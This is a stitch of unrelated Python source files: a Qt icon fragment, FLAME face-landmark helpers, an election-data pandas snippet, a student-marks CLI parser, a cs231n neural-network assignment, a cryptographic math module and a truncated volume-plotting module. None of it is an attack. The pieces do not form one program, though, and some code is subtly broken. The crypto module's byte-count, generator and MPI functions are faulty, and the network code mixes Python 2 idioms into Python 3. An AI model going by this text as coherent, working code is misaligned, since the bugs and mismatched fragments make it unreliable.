userIcon = QIcon("icons/user.svg")
elif state == Account.State.ERROR or state == Account.State.NETWORK_ANOMALY:
userIcon = QIcon("icons/cry.svg")
elif state == Account.State.OK:
userIcon = QIcon("icons/smile.svg")
elif state == Account.State.QUERY:
userIcon = QIcon("icons/query.svg")
else:
userIcon = QIcon("icons/error.svg")
self.buttonList[0].setIcon(userIcon)
self.buttonList[0].setIconSize(QSize(60, 60))
|
'''
Max-Planck-Gesellschaft zur Foerderung der Wissenschaften e.V. (MPG) is holder of all proprietary rights on this
computer program.
You can only use this computer program if you have closed a license agreement with MPG or you get the right to use
the computer program from someone who is authorized to grant you that right.
Any use of the computer program without a valid license is prohibited and liable to prosecution.
Copyright 2019 Max-Planck-Gesellschaft zur Foerderung der Wissenschaften e.V. (MPG). acting on behalf of its
Max Planck Institute for Intelligent Systems and the Max Planck Institute for Biological Cybernetics.
All rights reserved.
More information about FLAME is available at http://flame.is.tue.mpg.de.
For comments or questions, please email us at flame@tue.mpg.de
'''
import cv2
import sys
import pickle
import numpy as np
import tensorflow as tf
from psbody.mesh.sphere import Sphere
def load_binary_pickle(filepath):
with open(filepath, 'rb') as f:
if sys.version_info >= (3, 0):
data = pickle.load(f, encoding='latin1')
else:
data = pickle.load(f)
return data
def create_lmk_spheres(lmks, radius, color=[255.0, 0.0, 0.0]):
spheres = []
for lmk in lmks:
spheres.append(Sphere(lmk, radius).to_mesh(color))
return spheres
def load_embedding( file_path ):
""" funciton: load landmark embedding, in terms of face indices and barycentric coordinates for corresponding landmarks
note: the included example is corresponding to CMU IntraFace 49-point landmark format.
"""
lmk_indexes_dict = load_binary_pickle( file_path )
lmk_face_idx = lmk_indexes_dict[ 'lmk_face_idx' ].astype( np.uint32 )
lmk_b_coords = lmk_indexes_dict[ 'lmk_b_coords' ]
return lmk_face_idx, lmk_b_coords
def tf_get_model_lmks(tf_model, f, lmk_face_idx, lmk_b_coords):
"""Get a differentiable landmark embedding in the FLAME surface"""
faces = f[lmk_face_idx].astype(np.int32)
return tf.einsum('ijk,ij->ik', tf.gather(tf_model, faces), tf.convert_to_tensor(lmk_b_coords))
def tf_project_points(points, scale, trans):
'''
weak perspective camera
'''
return tf.scalar_mul(scale, tf.transpose(tf.linalg.matmul(tf.eye(num_rows=2, num_columns=3, dtype=points.dtype), points, transpose_b=True)) + trans)
def visualize_landmarks(img, lmks):
for i, (x, y) in enumerate(lmks):
cv2.circle(img, (int(x), int(y)), 4, (0, 0, 255), -1)
font = cv2.FONT_HERSHEY_SIMPLEX
text = '%d' % (i+1)
textsize = cv2.getTextSize(text, font, 1, 2)[0]
cv2.putText(img, text, (int(x-textsize[0]/2.0)+5, int(y)-5), font, 0.5, (0, 0, 255), 1, cv2.LINE_AA)
def load_picked_points(filename):
"""
Load a picked points file (.pp) containing 3D points exported from MeshLab.
Returns a Numpy array of size Nx3
"""
f = open(filename, 'r')
def get_num(string):
pos1 = string.find('\"')
pos2 = string.find('\"', pos1 + 1)
return float(string[pos1 + 1:pos2])
def get_point(str_array):
if 'x=' in str_array[0] and 'y=' in str_array[1] and 'z=' in str_array[2]:
return [get_num(str_array[0]), get_num(str_array[1]), get_num(str_array[2])]
else:
return []
pickedPoints = []
for line in f:
if 'point' in line:
str = line.split()
if len(str) < 4:
continue
ix = [i for i, s in enumerate(str) if 'x=' in s][0]
iy = [i for i, s in enumerate(str) if 'y=' in s][0]
iz = [i for i, s in enumerate(str) if 'z=' in s][0]
pickedPoints.append(get_point([str[ix], str[iy], str[iz]]))
f.close()
return np.array(pickedPoints)
|
from pandas import read_csv, read_excel
expb = read_csv("expb.csv", encoding="cp1255")
ballots = read_excel("kalpies_full_report.xls")
expb_incountry = expb[expb['סמל ישוב'] != 99999]
final_results = expb.sum()
|
import argparse
ParserInformation = {
'epilog' : 'Example: coepy -regno 210514665432 -dob 12-06-2001',
'arguments' : {
'--register-number' : {
'short' : '-regno',
'type' : str,
'help' : 'Register number of the student you want to check marks.'
},
'--date-of-birth': {
'short' : '-dob',
'type' : str,
'help' : 'Date of birth of the student you want to check marks.'
},
'--json-info-file':{
'short' : '-jif',
'type' : str,
'help' : 'Parses the given file in json and returns information as requested for a single user.'
}
},
'actionArguments': {
'--assessment-mark' : {
'short' : '-am' ,
'help' : 'Returns the assessment mark with respect to the student.'
},
'--no-headless' : {
'short' : '-nh',
'help' : 'Disable headless mode , i.e Show the entire browser when processing.'
},
'--verbose' : {
'short' : '-v',
'help' : 'Activate Verbose mode.'
},
'--quick-browse' : {
'short' : '-qb',
'help' : 'Simply Logs you in the COE WEBSITE in a blink , substains the state in a browser!'
}
}
}
class CoePyArgumentParser(object):
_mParser = None
_mProcessed = None
def __init__(self):
self._mParser = argparse.ArgumentParser(epilog = ParserInformation['epilog'])
Args = ParserInformation['arguments']
for e in Args:
self._mParser.add_argument(e, Args[e]['short'],type=Args[e]['type'],help=Args[e]['help'])
ActionArgs = ParserInformation['actionArguments']
for e in ActionArgs:
self._mParser.add_argument(e , ActionArgs[e]['short'] , action='count' , help=ActionArgs[e]['help'])
self._mProcessed = vars(self._mParser.parse_args())
def printHelp(self):
return self._mParser.print_help()
def isEmpty(self):
ret = True
for e in self._mProcessed:
if self._mProcessed[e] != None:
ret = False
break
return ret
def getValue(self , key):
ret = None
try:
ret = self._mProcessed[str(key)]
except:
ret = None
return ret
|
import numpy as np
from cs231n.layers import *
from cs231n.layer_utils import *
class TwoLayerNet(object):
"""
A two-layer fully-connected neural network with ReLU nonlinearity and
softmax loss that uses a modular layer design. We assume an input dimension
of D, a hidden dimension of H, and perform classification over C classes.
The architecure should be affine - relu - affine - softmax.
Note that this class does not implement gradient descent; instead, it
will interact with a separate Solver object that is responsible for running
optimization.
The learnable parameters of the model are stored in the dictionary
self.params that maps parameter names to numpy arrays.
"""
def __init__(self, input_dim=3*32*32, hidden_dim=100, num_classes=10,
weight_scale=1e-3, reg=0.0):
"""
Initialize a new network.
Inputs:
- input_dim: An integer giving the size of the input
- hidden_dim: An integer giving the size of the hidden layer
- num_classes: An integer giving the number of classes to classify
- dropout: Scalar between 0 and 1 giving dropout strength.
- weight_scale: Scalar giving the standard deviation for random
initialization of the weights.
- reg: Scalar giving L2 regularization strength.
"""
self.params = {}
self.reg = reg
############################################################################
# TODO: Initialize the weights and biases of the two-layer net. Weights #
# should be initialized from a Gaussian with standard deviation equal to #
# weight_scale, and biases should be initialized to zero. All weights and #
# biases should be stored in the dictionary self.params, with first layer #
# weights and biases using the keys 'W1' and 'b1' and second layer weights #
# and biases using the keys 'W2' and 'b2'. #
############################################################################
self.params['W1'] = weight_scale * np.random.randn(input_dim, hidden_dim)
self.params['b1'] = np.zeros(hidden_dim)
self.params['W2'] = weight_scale * np.random.randn(hidden_dim, num_classes)
self.params['b2'] = np.zeros(num_classes)
############################################################################
# END OF YOUR CODE #
############################################################################
def sigmoid(self, x):
return 1 / ( 1 + np.exp(-x))
def relu(self, x):
return np.maximum(0, x)
def loss(self, X, y=None):
"""
Compute loss and gradient for a minibatch of data.
Inputs:
- X: Array of input data of shape (N, d_1, ..., d_k)
- y: Array of labels, of shape (N,). y[i] gives the label for X[i].
Returns:
If y is None, then run a test-time forward pass of the model and return:
- scores: Array of shape (N, C) giving classification scores, where
scores[i, c] is the classification score for X[i] and class c.
If y is not None, then run a training-time forward and backward pass and
return a tuple of:
- loss: Scalar value giving the loss
- grads: Dictionary with the same keys as self.params, mapping parameter
names to gradients of the loss with respect to those parameters.
"""
scores = None
############################################################################
# TODO: Implement the forward pass for the two-layer net, computing the #
# class scores for X and storing them in the scores variable. #
############################################################################
# If X has more than 2 dimensions then reshape so that X has 2 dimensions
if len(X.shape) > 2:
X = np.reshape(X, (X.shape[0], X.shape[1]*X.shape[2]*X.shape[3]))
# Unpack variables from the params dictionary
W1, b1 = self.params['W1'], self.params['b1']
W2, b2 = self.params['W2'], self.params['b2']
reg = self.reg
N = X.shape[0]
a1 = np.dot(X, W1) + b1
hidden_layer = self.relu(a1) # ReLU activation
scores = np.dot(hidden_layer, W2) + b2
# compute the class probabilities
exp_scores = np.exp(scores)
probs = exp_scores / np.sum(exp_scores, axis=1, keepdims=True) # [N x K]
# average cross-entropy loss and regularization
corect_logprobs = -np.log(probs[range(N),y])
data_loss = np.sum(corect_logprobs)/N
reg_loss = 0.5*reg*np.sum(W1*W1) + 0.5*reg*np.sum(W2*W2)
loss = data_loss + reg_loss
############################################################################
# END OF YOUR CODE #
############################################################################
# If y is None then we are in test mode so just return scores
if y is None:
return scores
grads = {}
############################################################################
# TODO: Implement the backward pass for the two-layer net. Store the loss #
# in the loss variable and gradients in the grads dictionary. Compute data #
# loss using softmax, and make sure that grads[k] holds the gradients for #
# self.params[k]. Don't forget to add L2 regularization! #
# #
# NOTE: To ensure that your implementation matches ours and you pass the #
# automated tests, make sure that your L2 regularization includes a factor #
# of 0.5 to simplify the expression for the gradient. #
############################################################################
# compute the gradient on scores
dscores = probs
dscores[range(N),y] -= 1
dscores /= N
# W2 and b2
grads['W2'] = np.dot(hidden_layer.T, dscores)
grads['b2'] = np.sum(dscores, axis=0)
# next backprop into hidden layer
dhidden = np.dot(dscores, W2.T)
# backprop the ReLU non-linearity
dhidden[hidden_layer <= 0] = 0
# finally into W,b
grads['W1'] = np.dot(X.T, dhidden)
grads['b1'] = np.sum(dhidden, axis=0)
# add regularization gradient contribution
grads['W2'] += reg * W2
grads['W1'] += reg * W1
############################################################################
# END OF YOUR CODE #
############################################################################
return loss, grads
class FullyConnectedNet(object):
"""
A fully-connected neural network with an arbitrary number of hidden layers,
ReLU nonlinearities, and a softmax loss function. This will also implement
dropout and batch normalization as options. For a network with L layers,
the architecture will be
{affine - [batch norm] - relu - [dropout]} x (L - 1) - affine - softmax
where batch normalization and dropout are optional, and the {...} block is
repeated L - 1 times.
Similar to the TwoLayerNet above, learnable parameters are stored in the
self.params dictionary and will be learned using the Solver class.
"""
def __init__(self, hidden_dims, input_dim=3*32*32, num_classes=10,
dropout=0, use_batchnorm=False, reg=0.0,
weight_scale=1e-2, dtype=np.float32, seed=None):
"""
Initialize a new FullyConnectedNet.
Inputs:
- hidden_dims: A list of integers giving the size of each hidden layer.
- input_dim: An integer giving the size of the input.
- num_classes: An integer giving the number of classes to classify.
- dropout: Scalar between 0 and 1 giving dropout strength. If dropout=0 then
the network should not use dropout at all.
- use_batchnorm: Whether or not the network should use batch normalization.
- reg: Scalar giving L2 regularization strength.
- weight_scale: Scalar giving the standard deviation for random
initialization of the weights.
- dtype: A numpy datatype object; all computations will be performed using
this datatype. float32 is faster but less accurate, so you should use
float64 for numeric gradient checking.
- seed: If not None, then pass this random seed to the dropout layers. This
will make the dropout layers deteriminstic so we can gradient check the
model.
"""
self.use_batchnorm = use_batchnorm
self.use_dropout = dropout > 0
self.reg = reg
self.num_layers = 1 + len(hidden_dims)
self.dtype = dtype
self.params = {}
self.hidden_layers = {}
############################################################################
# TODO: Initialize the parameters of the network, storing all values in #
# the self.params dictionary. Store weights and biases for the first layer #
# in W1 and b1; for the second layer use W2 and b2, etc. Weights should be #
# initialized from a normal distribution with standard deviation equal to #
# weight_scale and biases should be initialized to zero. #
# #
# When using batch normalization, store scale and shift parameters for the #
# first layer in gamma1 and beta1; for the second layer use gamma2 and #
# beta2, etc. Scale parameters should be initialized to one and shift #
# parameters should be initialized to zero. #
############################################################################
# print
# print 'Initialize the parameters of the network'
# print
for i in range(1, self.num_layers+1):
W = 'W'+str(i)
b = 'b'+str(i)
if i == 1:
self.params[W] = weight_scale * np.random.randn(input_dim, hidden_dims[i-1])
self.params[b] = np.zeros(hidden_dims[i-1])
elif i == self.num_layers:
self.params[W] = weight_scale * np.random.randn(hidden_dims[i-2], num_classes)
self.params[b] = np.zeros(num_classes)
else:
self.params[W] = weight_scale * np.random.randn(hidden_dims[i-2], hidden_dims[i-1])
self.params[b] = np.zeros(hidden_dims[i-1])
############################################################################
# END OF YOUR CODE #
############################################################################
# When using dropout we need to pass a dropout_param dictionary to each
# dropout layer so that the layer knows the dropout probability and the mode
# (train / test). You can pass the same dropout_param to each dropout layer.
self.dropout_param = {}
if self.use_dropout:
self.dropout_param = {'mode': 'train', 'p': dropout}
if seed is not None:
self.dropout_param['seed'] = seed
# With batch normalization we need to keep track of running means and
# variances, so we need to pass a special bn_param object to each batch
# normalization layer. You should pass self.bn_params[0] to the forward pass
# of the first batch normalization layer, self.bn_params[1] to the forward
# pass of the second batch normalization layer, etc.
self.bn_params = []
if self.use_batchnorm:
self.bn_params = [{'mode': 'train'} for i in xrange(self.num_layers - 1)]
# Cast all parameters to the correct datatype
for k, v in self.params.iteritems():
self.params[k] = v.astype(dtype)
def sigmoid(self, x):
return 1 / ( 1 + np.exp(-x))
def relu(self, x):
return np.maximum(0, x)
def loss(self, X, y=None):
"""
Compute loss and gradient for the fully-connected net.
Input / output: Same as TwoLayerNet above.
"""
X = X.astype(self.dtype)
mode = 'test' if y is None else 'train'
# Set train/test mode for batchnorm params and dropout param since they
# behave differently during training and testing.
if self.dropout_param is not None:
self.dropout_param['mode'] = mode
if self.use_batchnorm:
for bn_param in self.bn_params:
bn_param[mode] = mode
scores = None
cache_dict = {}
cache_dict_counter = 0
############################################################################
# TODO: Implement the forward pass for the fully-connected net, computing #
# the class scores for X and storing them in the scores variable. #
# #
# When using dropout, you'll need to pass self.dropout_param to each #
# dropout forward pass. #
# #
# When using batch normalization, you'll need to pass self.bn_params[0] to #
# the forward pass for the first batch normalization layer, pass #
# self.bn_params[1] to the forward pass for the second batch normalization #
# layer, etc. #
############################################################################
if len(X.shape) > 2:
X = np.reshape(X, (X.shape[0], X.shape[1]*X.shape[2]*X.shape[3]))
# for p in self.params:
# d = {k: v for k, v in self.params.iteritems()}
# p = d
N = X.shape[0]
hidden_layer = X
reg_loss = 0
for i in range(1, self.num_layers+1):
cache_dict[i] = {}
W = 'W'+str(i)
b = 'b'+str(i)
# Compute regularisation loss
reg_loss += 0.5 * self.reg * np.sum(self.params[W]*self.params[W])
# For every layer but not the last
# if i < self.num_layers:
# affine
a, cache_dict[i]['affine'] = affine_forward(hidden_layer, self.params[W], self.params[b])
#print 'forward affine'
cache_dict_counter += 1
# if last layer then only make affine_forward
if i == self.num_layers:
scores = a
break
# batch norm
# ToDo
# relu
hidden_layer, cache_dict[i]['relu'] = relu_forward(a)
#print 'forward relu'
cache_dict_counter += 1
# dropout
if self.use_dropout:
hidden_layer, cache_dict[i]['dropout'] = dropout_forward(hidden_layer, self.dropout_param)
#print 'forward dropout'
cache_dict_counter += 1
self.hidden_layers[i] = hidden_layer
# OLD
# a = np.dot(hidden_layer, self.params[W]) + self.params[b]
# hidden_layer = self.relu(a) # ReLU activation
# self.hidden_layers[i] = hidden_layer
# For last layer
# else:
# scores, cache_dict[i]['affine'] = affine_forward(hidden_layer, self.params[W], self.params[b])
# #print 'forward affine'
#
# cache_dict_counter += 1
# OLD
# scores = np.dot(hidden_layer, self.params[W]) + self.params[b]
#print 'softmax'
# dscores = dx
# old
# compute the class probabilities
# exp_scores = np.exp(scores)
# probs = exp_scores / np.sum(exp_scores, axis=1, keepdims=True) # [N x K]
#
# # average cross-entropy loss and regularization
# correct_logprobs = -np.log(probs[range(N),y])
# data_loss = np.sum(correct_logprobs)/N
############################################################################
# END OF YOUR CODE #
############################################################################
# If test mode return early
if mode == 'test':
#print '---- return scores - no back ----'
return scores
grads = {}
############################################################################
# TODO: Implement the backward pass for the fully-connected net. Store the #
# loss in the loss variable and gradients in the grads dictionary. Compute #
# data loss using softmax, and make sure that grads[k] holds the gradients #
# for self.params[k]. Don't forget to add L2 regularization! #
# #
# When using batch normalization, you don't need to regularize the scale #
# and shift parameters. #
# #
# NOTE: To ensure that your implementation matches ours and you pass the #
# automated tests, make sure that your L2 regularization includes a factor #
# of 0.5 to simplify the expression for the gradient. #
############################################################################
# print
# print 'Implement the backward pass'
# print
# OLD
# compute the gradient on scores
# dscores = probs
# dscores[range(N),y] -= 1
# dscores /= N
# Loop backwards
#print "len(cache_dict)", len(cache_dict)
#for k in list(reversed(sorted(cache_dict.keys()))):
#print "len(cache_dict[k])", len(cache_dict[k])
# affine backward
#dx, dw, db = affine_backward(dx, cache_dict[k])
# dropout backward
# relu backward
# batch norm backward
#print "len(cache_dict[k])", len(cache_dict[k])
# for cache in cache_dict:
# d = {k: v for k, v in cache_dict.iteritems()}
# print d
# softmax loss
loss, dx = softmax_loss(scores, y)
loss += + reg_loss
# Loop backwards, i = 1 is last value
for i in xrange(self.num_layers, 0, -1):
W = 'W'+str(i)
b = 'b'+str(i)
# dropout
if 'dropout' in cache_dict[i]:
#print 'back dropout'
dx = dropout_backward(dx, cache_dict[i]['dropout'])
# relu
if 'relu' in cache_dict[i]:
#print 'back relu'
dx = relu_backward(dx, cache_dict[i]['relu'])
if 'batch' in cache_dict[i]:
#print 'back batch'
ok = 1
# affine
if 'affine' in cache_dict[i]:
#print 'back affine'
dx, dw, db = affine_backward(dx, cache_dict[i]['affine'])
grads[W] = dw
# add regularisation
grads[W] += self.reg * self.params[W]
grads[b] = db
# if i == self.num_layers:
#
# grads[W] = np.dot(self.hidden_layers[i-1].T, dscores)
# grads[b] = np.sum(dscores, axis=0)
#
# # add regularisation
# grads[W] += self.reg * self.params[W]
#
# # next backprop into hidden layer
# dhidden = np.dot(dscores, self.params[W].T)
#
# # backprop the ReLU non-linearity
# dhidden[self.hidden_layers[i-1] <= 0] = 0
#
# elif i > 1:
#
# grads[W] = np.dot(self.hidden_layers[i-1].T, dhidden)
# grads[b] = np.sum(dhidden, axis=0)
#
# # add regularisation
# grads[W] += self.reg * self.params[W]
#
# # next backprop into hidden layer
# dhidden = np.dot(dhidden, self.params[W].T)
#
# # backprop the ReLU non-linearity
# dhidden[self.hidden_layers[i-1] <= 0] = 0
#
# else:
# # finally into W,b
# grads[W] = np.dot(X.T, dhidden)
# grads[b] = np.sum(dhidden, axis=0)
#
# # add regularization gradient contribution
# grads[W] += self.reg * self.params[W]
############################################################################
# END OF YOUR CODE #
############################################################################
return loss, grads
|
"""cryptomath module
This module has basic math/crypto code."""
import os
import math
import base64
import binascii
import hashlib as sha
#
# We don't need the compat stuff anymore, so few updates:
# numbits == x.bit_length
# numbytes == x.bit_length // 8
#
# Instead of array() use bytearray().
#
def numBytes(n):
if n == 0:
return 0
# ceil(x.bit_length/8)
return n.bit_length() // 8 + 1 * (n.bit_length() % 8 == 0)
# **************************************************************************
# Load Optional Modules
# **************************************************************************
# Try to load M2Crypto/OpenSSL
try:
from M2Crypto import m2
m2cryptoLoaded = True
except ImportError:
m2cryptoLoaded = False
# Try to load cryptlib
try:
import cryptlib_py
try:
cryptlib_py.cryptInit()
except cryptlib_py.CryptException as e:
#If tlslite and cryptoIDlib are both present,
#they might each try to re-initialize this,
#so we're tolerant of that.
if e[0] != cryptlib_py.CRYPT_ERROR_INITED:
raise
cryptlibpyLoaded = True
except ImportError:
cryptlibpyLoaded = False
#Try to load GMPY
try:
import gmpy
gmpyLoaded = True
except ImportError:
gmpyLoaded = False
#Try to load pycrypto
try:
import Crypto.Cipher.AES
pycryptoLoaded = True
except ImportError:
pycryptoLoaded = False
# **************************************************************************
# PRNG Functions
# **************************************************************************
# Get os.urandom PRNG
try:
os.urandom(1)
def getRandomBytes(howMany):
return bytearray(os.urandom(howMany))
prngName = "os.urandom"
except:
# Else get cryptlib PRNG
if cryptlibpyLoaded:
def getRandomBytes(howMany):
randomKey = cryptlib_py.cryptCreateContext(cryptlib_py.CRYPT_UNUSED,
cryptlib_py.CRYPT_ALGO_AES)
cryptlib_py.cryptSetAttribute(randomKey,
cryptlib_py.CRYPT_CTXINFO_MODE,
cryptlib_py.CRYPT_MODE_OFB)
cryptlib_py.cryptGenerateKey(randomKey)
bytes = bytearray(howMany)
cryptlib_py.cryptEncrypt(randomKey, bytes)
return bytes
prngName = "cryptlib"
else:
#Else get UNIX /dev/urandom PRNG
try:
devRandomFile = open("/dev/urandom", "rb")
def getRandomBytes(howMany):
return bytearray(devRandomFile.read(howMany))
prngName = "/dev/urandom"
except IOError:
#Else get Win32 CryptoAPI PRNG
try:
import win32prng
def getRandomBytes(howMany):
s = win32prng.getRandomBytes(howMany)
if len(s) != howMany:
raise AssertionError()
return bytearray(s)
prngName = "CryptoAPI"
except ImportError:
#Else no PRNG :-(
def getRandomBytes(howMany):
raise NotImplementedError("No Random Number Generator "\
"available.")
prngName = "None"
# **************************************************************************
# Converter Functions
# **************************************************************************
def numberFromBytes(a):
total = 0
multiplier = 1
for count in range(len(a) - 1, -1, -1):
byte = a[count]
total += multiplier * byte
multiplier *= 256
return total
def bytesOfNumber(n):
howManyBytes = numBytes(n)
for count in range(howManyBytes - 1, -1, -1):
yield (n % 256)
n >>= 8
raise StopIteration
def base64ToBytes(s):
try:
return base64.decodebytes(s)
except binascii.Error as e:
raise SyntaxError(e)
except binascii.Incomplete as e:
raise SyntaxError(e)
def bytesToBase64(s):
return base64.encodebytes(s).replace(b"\n", b"")
def numberToBase64(n):
return bytesToBase64(bytesOfNumber(n))
def base64ToNumber(bstr):
return numberFromBytes(base64ToBytes(bstr))
def mpiToNumber(mpi): #mpi is an openssl-format bignum string
if (ord(mpi[4]) & 0x80) != 0: #Make sure this is a positive number
raise AssertionError()
return numberFromBytes(mpi[4:])
def numberToMPI(n):
ba = bytearray(bytesOfNumber(n))
ext = 0
#If the high-order bit is going to be set,
#add an extra byte of zeros
if (n.bit_length & 0x7) == 0:
ext = 1
length = numBytes(n) + ext
ba = bytearray(4 + ext) + ba
ba[0] = (length >> 24) & 0xFF
ba[1] = (length >> 16) & 0xFF
ba[2] = (length >> 8) & 0xFF
ba[3] = length & 0xFF
return ba # no need to make it immutable now
# **************************************************************************
# Misc. Utility Functions
# **************************************************************************
def hashAndBase64(s):
return bytesToBase64(sha.sha(s).digest())
def getBase64Nonce(numChars = 22): #defaults to an 132 bit nonce
rb = getRandomBytes(numChars)
bytesStr = "".join(map(chr, rb))
return bytesToBase64(bytesStr)[:numChars]
# **************************************************************************
# Big Number Math
# **************************************************************************
def getRandomNumber(low, high):
if low >= high:
raise AssertionError()
howManyBits = high.bit_length()
howManyBytes = numBytes(high)
lastBits = howManyBits % 8
while 1:
ba = getRandomBytes(howManyBytes)
if lastBits:
ba[0] = ba[0] % (1 << lastBits)
n = numberFromBytes(ba)
if n >= low and n < high:
return n
def gcd(a, b):
a, b = max(a, b), min(a, b)
while b:
a, b = b, a % b
return a
def lcm(a, b):
return (a * b) // gcd(a, b)
#Returns inverse of a mod b, zero if none
#Uses Extended Euclidean Algorithm
def invMod(a, b):
c, d = a, b
uc, ud = 1, 0
while c != 0:
q = d // c
c, d = d - (q * c), c
uc, ud = ud - (q * uc), uc
if d == 1:
return ud % b
return 0
if gmpyLoaded:
def powMod(base, power, modulus):
base = gmpy.mpz(base)
power = gmpy.mpz(power)
modulus = gmpy.mpz(modulus)
result = pow(base, power, modulus)
return int(result)
else:
#Copied from Bryan G. Olson's post to comp.lang.python
#Does left-to-right instead of pow()'s right-to-left,
#thus about 30% faster than the python built-in with small bases
def powMod(base, power, modulus):
nBitScan = 5
""" Return base**power mod modulus, using multi bit scanning
with nBitScan bits at a time."""
#TREV - Added support for negative exponents
negativeResult = False
if (power < 0):
power *= -1
negativeResult = True
exp2 = 2 ** nBitScan
mask = exp2 - 1
# Break power into a list of digits of nBitScan bits.
# The list is recursive so easy to read in reverse direction.
nibbles = None
while power:
nibbles = int(power & mask), nibbles
power = power >> nBitScan
# Make a table of powers of base up to 2**nBitScan - 1
lowPowers = [1]
for i in range(1, exp2):
lowPowers.append((lowPowers[i - 1] * base) % modulus)
# To exponentiate by the first nibble, look it up in the table
nib, nibbles = nibbles
prod = lowPowers[nib]
# For the rest, square nBitScan times, then multiply by
# base^nibble
while nibbles:
nib, nibbles = nibbles
for i in range(nBitScan):
prod = (prod * prod) % modulus
if nib: prod = (prod * lowPowers[nib]) % modulus
#TREV - Added support for negative exponents
if negativeResult:
prodInv = invMod(prod, modulus)
#Check to make sure the inverse is correct
if (prod * prodInv) % modulus != 1:
raise AssertionError()
return prodInv
return prod
#Pre-calculate a sieve of the ~100 primes < 1000:
def makeSieve(n):
sieve = list(range(n))
for count in range(2, int(math.sqrt(n))):
if sieve[count] == 0:
continue
x = sieve[count] * 2
while x < len(sieve):
sieve[x] = 0
x += sieve[count]
sieve = [x for x in sieve[2:] if x]
return sieve
sieve = makeSieve(1000)
def isPrime(n, iterations = 5, display = False):
#Trial division with sieve
for x in sieve:
if x >= n: return True
if n % x == 0: return False
#Passed trial division, proceed to Rabin-Miller
#Rabin-Miller implemented per Ferguson & Schneier
#Compute s, t for Rabin-Miller
if display: print("*", end = " ")
s, t = n - 1, 0
while s % 2 == 0:
s, t = s // 2, t + 1
#Repeat Rabin-Miller x times
a = 2 #Use 2 as a base for first iteration speedup, per HAC
for count in range(iterations):
v = powMod(a, s, n)
if v == 1:
continue
i = 0
while v != n - 1:
if i == t - 1:
return False
else:
v, i = powMod(v, 2, n), i + 1
a = getRandomNumber(2, n)
return True
def getRandomPrime(bits, display = False):
if bits < 10:
raise AssertionError()
#The 1.5 ensures the 2 MSBs are set
#Thus, when used for p,q in RSA, n will have its MSB set
#
#Since 30 is lcm(2,3,5), we'll set our test numbers to
#29 % 30 and keep them there
low = (2 ** (bits - 1)) * 3 // 2
high = 2 ** bits - 30
p = getRandomNumber(low, high)
p += 29 - (p % 30)
while 1:
if display: print(".",)
p += 30
if p >= high:
p = getRandomNumber(low, high)
p += 29 - (p % 30)
if isPrime(p, display = display):
return p
#Unused at the moment...
def getRandomSafePrime(bits, display = False):
if bits < 10:
raise AssertionError()
#The 1.5 ensures the 2 MSBs are set
#Thus, when used for p,q in RSA, n will have its MSB set
#
#Since 30 is lcm(2,3,5), we'll set our test numbers to
#29 % 30 and keep them there
low = (2 ** (bits - 2)) * 3 // 2
high = (2 ** (bits - 1)) - 30
q = getRandomNumber(low, high)
q += 29 - (q % 30)
while 1:
if display: print(".",)
q += 30
if (q >= high):
q = getRandomNumber(low, high)
q += 29 - (q % 30)
#Ideas from Tom Wu's SRP code
#Do trial division on p and q before Rabin-Miller
if isPrime(q, 0, display = display):
p = (2 * q) + 1
if isPrime(p, display = display):
if isPrime(q, display = display):
return p
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Tools for visualizing volumetric data
#
# Davis Bennett
# davis.v.bennett@gmail.com
#
# License: MIT
#
from ..util.roi import ROI
from tqdm.auto import tqdm
def proj_plot(
volume,
proj_fun,
clims="auto",
figsize=4,
aspect=(1, 1, 1),
cmap="gray",
interpolation="Lanczos",
):
"""
Project and plot a volume along 3 axes using a user-supplied function, using separate subplots for each projection
volume : Numpy array, 3D (grayscale data) or 4D (RGB data).
data to be projected.
proj_fun : function to apply along each axis.
Some function of numpy arrays that takes axis as an argument, e.g. numpy.max()
clims : clims to use when displaying projections.
String or iterable with 3 elements. Default is 'auto', which means the 0th and 100th percentiles
will be used as the clims for each projection. If not auto, clims should be set to an iterable of length-2
iterables, each setting the clim for a projection. This setting is ignored if input array is 4D.
figsize : size of the figure containing the plots
Float or int
aspect : aspect ratios of each axis
Iterable of floats or ints.
cmap : color map used in plots. This setting is ignored if input array is 4D
"""
from numpy import percentile, hstack, swapaxes
from matplotlib.pyplot import subplots
ori = "lower"
projs = [proj_fun(volume, axis=axis) for axis in range(3)]
# calculate clims for grayscale if necessary
if clims == "auto":
clims = percentile(hstack([p.ravel() for p in projs]), (0, 100))
clims = (clims, clims, clims)
z, y, x = (
volume.shape[0] * aspect[0],
volume.shape[1] * aspect[1],
volume.shape[2] * aspect[2],
)
w = x + z
h = y + z
wr = x / w
hr = y / h
p_xy = projs[0]
p_zx = projs[1]
p_zy = swapaxes(projs[2], 0, 1)
fig, axs = subplots(nrows=2, ncols=2, figsize=(figsize, figsize * h / w))
axs[0][0].imshow(
p_xy,
origin=ori,
aspect="auto",
cmap=cmap,
clim=clims[0],
interpolation=interpolation,
)
axs[1][0].imshow(
p_zx,
origin=ori,
aspect="auto",
cmap=cmap,
clim=clims[1],
interpolation=interpolation,
)
axs[0][1].imshow(
p_zy,
origin=ori,
aspect="auto",
cmap=cmap,
clim=clims[2],
interpolation=interpolation,
)
axs[0][0].set_position([0, 1 - hr, wr, hr])
axs[0][1].set_position([wr, 1 - hr, 1 - wr, hr])
axs[1][0].set_position([0, 0, wr, 1 - hr])
axs[1][1].set_position([wr, 0, 1 - wr, 1 - hr])
[ax.axis("off") for ax in axs.ravel()]
return axs
def proj_fuse(data, fun, aspect=(1, 1, 1), fill_value=0, arrangement=[0, 1, 2]):
"""
Project a volume along 3 axes using a user-supplied function, returning a 2D composite of projections. If the input
array has the shape [z,y,x], the output shape will be: [z * aspect_z + y * aspect + y, z * aspect_z + x * aspect_x]
data : 3D numpy array
Volumetric data to be projected.
fun : Function to apply along each axis of the input array.
A function of numpy arrays that takes an axis as a second argument, e.g. numpy.max()
aspect : Iterable of floats or ints.
Amount to scale each axis when forming the composite of projections
fill_value : int or float
Default value in the array that this function returns. The corner of the
"""
from numpy import array, zeros
from skimage.transform import resize
old_dims = array(data.shape)
new_dims = array(aspect) * old_dims
stretched = (
zeros([new_dims[1] + new_dims[0], new_dims[2] + new_dims[0]]) + fill_value
)
projs = []
for axis, dim in enumerate(new_dims):
indexer = list(range(len(new_dims)))
indexer.pop(axis)
projs.append(
resize(
fun(data, axis), new_dims[indexer], mode="constant", preserve_range=True
)
)
if arrangement == [0, 1, 2]:
stretched[: new_dims[1], new_dims[2] :] = projs[2].T
stretched[new_dims[1] :, : new_dims[2]] = projs[1]
stretched[: new_dims[1], : new_dims[2]] = projs[0]
elif arrangement == [2, 0, 1]:
